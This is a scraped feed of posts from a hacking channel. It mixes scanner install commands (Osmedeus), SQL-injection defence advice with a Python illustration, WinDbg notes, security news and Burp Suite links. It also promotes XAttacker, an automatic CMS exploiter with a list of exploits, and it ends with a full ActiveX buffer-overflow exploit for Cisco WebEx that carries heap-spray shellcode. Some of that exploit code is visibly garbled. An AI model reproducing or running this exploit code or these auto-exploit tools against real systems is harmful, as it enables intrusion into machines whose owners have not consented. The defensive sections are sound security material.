UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform that collects and analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Osmedeus lets you automatically run a collection of awesome tools for reconnaissance and vulnerability scanning against a target.

🄸🄽🅂🅃🄰🄻🄻🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/j3ssie/Osmedeus

2) cd Osmedeus

3) ./install.sh

4) ./osmedeus.py -t example.com

5) # normal routine
./osmedeus.py -t example.com
./osmedeus.py -T list_of_target.txt

# normal routine but slow speed on all modules
./osmedeus.py -t example.com --slow 'all'

# normal routine but exclude some modules
./osmedeus.py -t example.com -x 'linkfinding,dirb'

# direct mode examples
./osmedeus.py -m subdomain -t example.com
./osmedeus.py -m portscan -i "1.2.3.4/24"

./osmedeus.py -m "portscan,vulnscan" -i "1.2.3.4/24" -w result_folder

# direct list mode examples
./osmedeus.py -m portscan -I list_of_targets.txt
./osmedeus.py -m portscan,vulnscan -I list_of_targets.txt
./osmedeus.py -m screen -I list_of_targets.txt -w result_folder

# report mode
./osmedeus.py -t example.com --report list
./osmedeus.py -t example.com --report export
./osmedeus.py -t example.com --report sum
./osmedeus.py -t example.com --report short
./osmedeus.py -t example.com --report full

🦑 F E A T U R E S :

Subdomain Scan.
Subdomain TakeOver Scan.
Screenshot the target.
Basic recon like Whois, Dig info.
Web Technology detection.
IP Discovery.
CORS Scan.
SSL Scan.
Wayback Machine Discovery.
URL Discovery.
Headers Scan.
Port Scan.
Vulnerability Scan.
Separate workspaces to store all scan output and detailed logging.
REST API.
React Web UI.
Support Continuous Scan.
Slack notifications.
Easily view reports from the command line.

enjoy ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 SQL injection vulnerability solutions:

1. The key to solving SQL injection vulnerabilities is to strictly check all data input from users and to apply the principle of least privilege to the database configuration.

2. All query statements should use the parameterized query interface provided by the database. Parameterized statements pass user input as parameters instead of embedding it into the SQL statement.

3. Special characters ('"\<>&*; etc.) entering the database are escaped or encoded.

4. Confirm the type of each piece of data. For example, numeric data must be numeric, and the storage field in the database must correspond to the int type.

5. Strictly limit the length of the data, which to a certain extent prevents relatively long SQL injection statements from being executed correctly.

6. Unify the encoding used by each data layer of the website. It is recommended to use UTF-8. Inconsistent encoding between upper and lower layers may allow some filtering models to be bypassed.

7. Strictly restrict the database permissions of the website's database user, granting this user only the permissions needed for its work, thereby minimizing the harm an injection attack can do to the database.

8. Avoid displaying SQL error messages on the website, such as type errors and field mismatches, to prevent attackers from using these error messages to make judgments.

9. Before the website is released, it is recommended to use professional SQL injection detection tools to detect and patch these SQL injection vulnerabilities in time.

ENJOY ❤️👍🏻
WRITTEN BY
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
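
Points 2, 4, 5 and 8 of the SQL injection list above, shown as an added example that is not part of the original post. It uses Python's standard sqlite3 module; the table, the function names and the length limit are assumptions made for the illustration.

```python
import sqlite3

MAX_ID_LEN = 10  # assumed limit for this example (point 5)

def make_db():
    """In-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return db

def lookup_vulnerable(db, user_id):
    # Anti-pattern: the input becomes part of the SQL text, so it can
    # change the structure of the statement.
    return db.execute("SELECT name FROM users WHERE id = " + user_id).fetchall()

def lookup_safe(db, user_id):
    # Points 4 and 5: reject anything that is not a short ASCII integer.
    if len(user_id) > MAX_ID_LEN or not (user_id.isascii() and user_id.isdigit()):
        raise ValueError("invalid id")
    try:
        # Point 2: the value is bound as a parameter, never spliced into SQL.
        cur = db.execute("SELECT name FROM users WHERE id = ?", (int(user_id),))
        return cur.fetchall()
    except sqlite3.Error:
        # Point 8: keep driver errors out of the response (log them server-side).
        raise RuntimeError("request failed") from None

def find_by_name(db, name):
    # Bound string parameters need no manual quoting or escaping.
    return db.execute("SELECT id FROM users WHERE name = ?", (name,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    probe = "1 OR 1=1"  # constructed input that is not a plain integer
    print("concatenated:", lookup_vulnerable(db, probe))
    print("bound, valid id:", lookup_safe(db, "1"))
    print("bound string:", find_by_name(db, "x' OR '1'='1"))
```

The concatenated query returns every row for the constructed input, while the bound versions treat the same text as data and either reject it or match nothing.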
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
WinDbg Malware Analysis Cheat Sheet.pdf
1) !address List all memory segments in the process with their permissions and memory type. This is similar to the Memory Map in x64dbg.

2) !address [virtual address] List information about the memory segment that contains the virtual address. For example, !address 400000 would show information about the section that contains address 0x400000. This is a quick way to find the start and end of a memory segment if you want to dump it.

3) .writemem [file name] [start address] [end address] Dump memory range to file. For example, .writemem C:\dump.bin 400000 401000 would dump memory starting at 0x400000 and ending at 0x401000 to the dump.bin file.

4) eb [address] [byte] Enter one byte into memory at the address. For example, eb 400000 0xff would change the byte at address 0x400000 to 0xff. For a full list of enter commands (string, word, etc.) see the Microsoft docs here.

#full with video
Support & Share ❤️👍🏻


T.me/UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 X Attacker Tool, Website Vulnerability Scanner & Auto Exploiter

🄸🄽🅂🅃🄰🄻🄻🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

Install on Termux:

1) git clone https://github.com/Moham3dRiahi/XAttacker.git

2) cd XAttacker

3) chmod +x termux-install.sh

4) bash termux-install.sh

🦑 Installation on Windows

1) Download Perl

2) Download XAttacker

3) Extract XAttacker into Desktop

4) Open CMD and type the following commands:

5) cd Desktop/XAttacker-master/

6) perl XAttacker.pl

🦑 SOME FEATURES :

• blocktestimonial Exploit
• Rightnow Theme Exploit
• Konzept Exploit
• Omni Secure Files Exploit
• Pitchprint Exploit
• Satoshi Exploit
• Pinboard Exploit
• Barclaycart Exploit
• Com Facileforms Exploit
• Com Jwallpapers Exploit
• Com Extplorer Exploit
• Com Rokdownloads Exploit
• Com Sexycontactform Exploit
• Com Jbcatalog Exploit
• Com Blog Exploit
• Com Foxcontact Exploit
• Drupal Geddon Exploit


@UndercodeTesting
✅ verified
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
From unauthenticated to root on a supervision appliance.pdf
EyesOfNetwork (“EON”) is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application. EyesOfNetwork Supervision is the first brick of a range of products aimed at assisting IT management and governance. EyesOfNetwork Supervision provides event management, availability, problems and capacity

#full tutorial + pictures
Forwarded from UNDERCODE NEWS
The US government is exposing new malicious program BLINDINGCAN
Forwarded from UNDERCODE NEWS
Mirai botnet attacks tens of thousands of low-password Linux servers
Forwarded from UNDERCODE NEWS
Vulnerability of Jenkins server may expose confidential details
Forwarded from UNDERCODE NEWS
Whatsapp is down now for some Countries
Forwarded from UNDERCODE NEWS
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 3 ways to encrypt emails

> There are currently three common mail encryption methods:

1️⃣ The first type: use a symmetric encryption algorithm to encrypt mail

A symmetric encryption algorithm is an earlier kind of encryption algorithm with mature technology. The sender processes the plaintext (original data) and the encryption key together with a special encryption algorithm, turning it into complex ciphertext, and sends it out. To read the original text, the recipient must decrypt the ciphertext using the same key that was used for encryption and the inverse of the same algorithm, restoring it to readable plaintext.

2️⃣ The second type: use PKI/CA certification to encrypt mail

Most current email encryption systems are based on this method. PKI (Public Key Infrastructure) refers to the public key infrastructure, and CA (Certificate Authority) refers to the certification center, so the two are collectively referred to as "PKI/CA". The registration center is responsible for reviewing the true identity of the certificate applicant. After the review is passed, it uploads the user information to the certification center through the network, and the certification center is responsible for the final certification processing. Revocation and renewal of a certificate also need to be submitted by the registration agency to the certification center for processing. In general, the certification center faces the registration centers, the registration center faces the end user, and the registration agency is the intermediate channel between the user and the certification center. The management of public key certificates is a complex system. This encryption method is only suitable for enterprises, organizations and some high-end users. Because CA certificates are troublesome to obtain and cumbersome to exchange, this type of email encryption has been difficult to popularize.

3️⃣ The third type: use identity-based cryptography for email encryption

To simplify the key management problem of traditional public key cryptosystems, in 1984 A. Shamir, an Israeli scientist and one of the inventors of the well-known RSA system, proposed the idea of identity-based cryptography: the user's public identity information (such as e-mail address, IP address, name, etc.) serves as the user's public key, and the user's private key is generated by a trusted center called the private key generator. In the following two decades, the design of identity-based cryptosystems became a hot research field in cryptography.


@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 SOME GOOD HACKING RESOURCES

1. Setup lab with bWAPP – https://www.youtube.com/watch?v=dwtUn3giwTk&index=1&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV

2. Set up Burp Suite – https://www.youtube.com/watch?v=hQsT4rSa_v0&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=2

3. Configure Firefox and add certificate – https://www.youtube.com/watch?v=hfsdJ69GSV4&index=3&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV

4. Mapping and scoping website – https://www.youtube.com/watch?v=H_iVteMDRo&index=4&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV

5. Spidering – https://www.youtube.com/watch?v=97uMUQGIe14&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=5

6. Active and passive scanning – https://www.youtube.com/watch?v=1Mjom6AcFyU&index=6&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV

7. Scanner options and demo – https://www.youtube.com/watch?v=gANi4Kt7ek&index=7&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV

8. Introduction to password security – https://www.youtube.com/watch?v=FwcUhcLO9iM&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=8

9. Intruder – https://www.youtube.com/watch?v=wtMg9oEMTa8&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=9

10. Intruder attack types – https://www.youtube.com/watch?v=N5ndYPwddkQ&index=10&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV

11. Payload settings – https://www.youtube.com/watch?v=5GpdlbtL1Q&index=11&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV


@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit code 2020 :


<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁